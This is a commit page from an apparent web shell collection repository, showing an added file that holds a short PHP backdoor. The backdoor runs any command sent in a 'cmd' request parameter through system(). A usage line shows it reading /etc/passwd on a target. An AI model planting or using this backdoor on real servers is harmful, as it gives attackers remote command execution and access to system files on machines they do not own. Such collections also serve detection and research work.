1
0
mirror of https://github.com/tennc/webshell.git synced 2026-01-03 21:29:03 +00:00

add xakep-shells

This commit is contained in:
tennc
2014-05-05 11:53:59 +08:00
parent 82dda2540f
commit c8e0a58f61
171 changed files with 164183 additions and 0 deletions

View File

@@ -0,0 +1,17 @@
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->